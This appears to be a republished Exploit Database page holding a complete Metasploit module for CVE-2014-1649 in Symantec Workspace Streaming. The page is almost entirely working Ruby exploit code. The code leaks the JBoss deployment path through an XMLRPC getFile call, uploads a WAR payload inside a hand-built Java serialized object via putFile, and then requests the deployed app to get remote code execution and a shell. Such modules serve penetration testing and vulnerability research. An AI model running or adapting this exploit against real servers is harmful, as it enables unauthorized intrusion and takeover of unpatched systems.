Symantec Workspace Streaming – Arbitrary File Upload (Metasploit)

• Exploit Database
• 14 阅读

• 作者： Metasploit
  日期： 2014-05-26
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/33521/

• ##
  # This module requires Metasploit: http//metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  require 'rexml/document'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  include REXML
  
  def initialize(info = {})
  super(update_info(info,
  'Name'=> 'Symantec Workspace Streaming Arbitrary File Upload',
  'Description' => %q{
  This module exploits a code execution flaw in Symantec Workspace Streaming. The
  vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the
  as_agent.exe service, which allows for uploading arbitrary files under the server root.
  This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order
  to achieve remote code execution. This module has been tested successfully on Symantec
  Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single
  machine deployment, and also in the backend role in a multiple machine deployment.
  },
  'Author' =>
  [
  'rgod <rgod[at]autistici.org>', # Vulnerability discovery
  'juan vazquez' # Metasploit module
  ],
  'License' => MSF_LICENSE,
  'References'=>
  [
  ['CVE', '2014-1649'],
  ['BID', '67189'],
  ['ZDI', '14-127'],
  ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00']
  ],
  'Privileged'=> true,
  'Platform'=> 'java',
  'Arch' => ARCH_JAVA,
  'Targets' =>
  [
  [ 'Symantec Workspace Streaming 6.1 SP8 / Java Universal', {} ]
  ],
  'DefaultTarget'=> 0,
  'DisclosureDate' => 'May 12 2014'))
  
  register_options(
  [
  Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file)
  OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy)
  ], self.class)
  end
  
  def send_xml_rpc_request(xml)
  res = send_request_cgi(
  {
  'uri' => normalize_uri("/", "xmlrpc"),
  'method'=> 'POST',
  'ctype' => 'text/xml; charset=UTF-8',
  'data'=> xml
  })
  
  res
  end
  
  def build_soap_get_file(file_path)
  xml = Document.new
  xml.add_element(
  "methodCall",
  {
  'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
  })
  method_name = xml.root.add_element("methodName")
  method_name.text = "ManagementAgentServer.getFile"
  
  params = xml.root.add_element("params")
  
  param_server_root = params.add_element("param")
  value_server_root = param_server_root.add_element("value")
  value_server_root.text = "*AWESE"
  
  param_file_type = params.add_element("param")
  value_file_type = param_file_type.add_element("value")
  type_file_type = value_file_type.add_element("i4")
  type_file_type.text = "0" # build path from the server root directory
  
  param_file_name = params.add_element("param")
  value_file_name = param_file_name.add_element("value")
  value_file_name.text = file_path
  
  param_file_binary = params.add_element("param")
  value_file_binary = param_file_binary.add_element("value")
  type_file_binary = value_file_binary.add_element("boolean")
  type_file_binary.text = "0"
  
  xml << XMLDecl.new("1.0", "UTF-8")
  
  xml.to_s
  end
  
  def build_soap_put_file(file)
  xml = Document.new
  xml.add_element(
  "methodCall",
  {
  'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
  })
  method_name = xml.root.add_element("methodName")
  method_name.text = "ManagementAgentServer.putFile"
  
  params = xml.root.add_element("params")
  
  param_server_root = params.add_element("param")
  value_server_root = param_server_root.add_element("value")
  value_server_root.text = "*AWESE"
  
  param_file_type = params.add_element("param")
  value_file_type = param_file_type.add_element("value")
  type_file_type = value_file_type.add_element("i4")
  type_file_type.text = "0" # build path from the server root directory
  
  param_file = params.add_element("param")
  value_file = param_file.add_element("value")
  type_value_file = value_file.add_element("ex:serializable")
  type_value_file.text = file
  
  xml << XMLDecl.new("1.0", "UTF-8")
  
  xml.to_s
  end
  
  def build_soap_check_put
  xml = Document.new
  xml.add_element(
  "methodCall",
  {
  'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
  })
  method_name = xml.root.add_element("methodName")
  method_name.text = "ManagementAgentServer.putFile"
  xml.root.add_element("params")
  xml << XMLDecl.new("1.0", "UTF-8")
  xml.to_s
  end
  
  def parse_method_response(xml)
  doc = Document.new(xml)
  file = XPath.first(doc, "methodResponse/params/param/value/ex:serializable")
  
  unless file.nil?
  file = Rex::Text.decode_base64(file.text)
  end
  
  file
  end
  
  def get_file(path)
  xml_call = build_soap_get_file(path)
  file = nil
  
  res = send_xml_rpc_request(xml_call)
  
  if res && res.code == 200 && res.body
  file = parse_method_response(res.body.to_s)
  end
  
  file
  end
  
  def put_file(file)
  result = nil
  xml_call = build_soap_put_file(file)
  
  res = send_xml_rpc_request(xml_call)
  
  if res && res.code == 200 && res.body
  result = parse_method_response(res.body.to_s)
  end
  
  result
  end
  
  def upload_war(war_name, war, dst)
  result = false
  java_file = build_java_file_info("#{dst}#{war_name}", war)
  java_file = Rex::Text.encode_base64(java_file)
  
  res = put_file(java_file)
  
  if res && res =~ /ReturnObject.*StatusMessage.*Boolean/
  result = true
  end
  
  result
  end
  
  def jboss_deploy_path
  path = nil
  leak = get_file("bin/CreateDatabaseSchema.cmd")
  
  if leak && leak =~ /\[INSTALLDIR\](.*)ste\/ste.jar/
  path = $1
  end
  
  path
  end
  
  def check
  check_result = Exploit::CheckCode::Safe
  
  if jboss_deploy_path.nil?
  xml = build_soap_check_put
  res = send_xml_rpc_request(xml)
  
  if res && res.code == 200 && res.body && res.body.to_s =~ /No method matching arguments/
  check_result =Exploit::CheckCode::Detected
  end
  else
  check_result =Exploit::CheckCode::Appears
  end
  
  check_result
  end
  
  def exploit
  print_status("#{peer} - Leaking the jboss deployment directory...")
  jboss_path =jboss_deploy_path
  
  if jboss_path.nil?
  fail_with(Exploit::Unknown, "#{peer} - Failed to disclose the jboss deployment directory")
  end
  
  print_status("#{peer} - Building WAR payload...")
  
  app_name = Rex::Text.rand_text_alpha(4 + rand(4))
  war_name = "#{app_name}.war"
  war = payload.encoded_war({ :app_name => app_name }).to_s
  deploy_dir = "..#{jboss_path}"
  
  print_status("#{peer} - Uploading WAR payload...")
  
  res = upload_war(war_name, war, deploy_dir)
  
  unless res
  fail_with(Exploit::Unknown, "#{peer} - Failed to upload the war payload")
  end
  
  register_files_for_cleanup("../server/appstream/deploy/#{war_name}")
  
  10.times do
  select(nil, nil, nil, 2)
  
  # Now make a request to trigger the newly deployed war
  print_status("#{rhost}:#{ste_port} - Attempting to launch payload in deployed WAR...")
  res = send_request_cgi(
  {
  'uri'=> normalize_uri("/", app_name, Rex::Text.rand_text_alpha(rand(8)+8)),
  'method' => 'GET',
  'rport'=> ste_port # Auto Deploy can be reached through the "as_ste.exe" service
  })
  # Failure. The request timed out or the server went away.
  break if res.nil?
  # Success! Triggered the payload, should have a shell incoming
  break if res.code == 200
  end
  
  end
  
  def ste_port
  datastore['STE_PORT']
  end
  
  # com.appstream.cm.general.FileInfo serialized object
  def build_java_file_info(file_name, contents)
  stream ="\xac\xed" # stream magic
  stream << "\x00\x05" # stream version
  stream << "\x73" # new Object
  
  stream << "\x72" # TC_CLASSDESC
  stream << ["com.appstream.cm.general.FileInfo".length].pack("n")
  stream << "com.appstream.cm.general.FileInfo"
  stream << "\xa3\x02\xb6\x1e\xa1\x6b\xf0\xa7" # class serial version identifier
  stream << "\x02" # flags SC_SERIALIZABLE
  stream << [6].pack("n") # number of fields in the class
  
  stream << "Z" # boolean
  stream << ["bLastPage".length].pack("n")
  stream << "bLastPage"
  
  stream << "J" # long
  stream << ["lFileSize".length].pack("n")
  stream << "lFileSize"
  
  stream << "[" # array
  stream << ["baContent".length].pack("n")
  stream << "baContent"
  stream << "\x74" # TC_STRING
  stream << ["[B".length].pack("n")
  stream << "[B" # field's type (byte array)
  
  stream << "L" # Object
  stream << ["dTimeStamp".length].pack("n")
  stream << "dTimeStamp"
  stream << "\x74" # TC_STRING
  stream << ["Ljava/util/Date;".length].pack("n")
  stream << "Ljava/util/Date;" #field's type (Date)
  
  stream << "L" # Object
  stream << ["sContent".length].pack("n")
  stream << "sContent"
  stream << "\x74" # TC_STRING
  stream << ["Ljava/lang/String;".length].pack("n")
  stream << "Ljava/lang/String;" #field's type (String)
  
  stream << "L" # Object
  stream << ["sFileName".length].pack("n")
  stream << "sFileName"
  stream << "\x71" # TC_REFERENCE
  stream << [0x007e0003].pack("N") # handle
  
  stream << "\x78" # TC_ENDBLOCKDATA
  stream << "\x70" # TC_NULL
  
  # Values
  stream << [1].pack("c") # bLastPage
  
  stream << [0xffffffff, 0xffffffff].pack("NN") # lFileSize
  
  stream << "\x75" # TC_ARRAY
  stream << "\x72" # TC_CLASSDESC
  stream << ["[B".length].pack("n")
  stream << "[B" # byte array)
  stream << "\xac\xf3\x17\xf8\x06\x08\x54\xe0" # class serial version identifier
  stream << "\x02" # flags SC_SERIALIZABLE
  stream << [0].pack("n") # number of fields in the class
  stream << "\x78" # TC_ENDBLOCKDATA
  stream << "\x70" # TC_NULL
  stream << [contents.length].pack("N")
  stream << contents # baContent
  
  stream << "\x70" # TC_NULL # dTimeStamp
  
  stream << "\x70" # TC_NULL # sContent
  
  stream << "\x74" # TC_STRING
  stream << [file_name.length].pack("n")
  stream << file_name # sFileName
  
  stream
  end
  
  end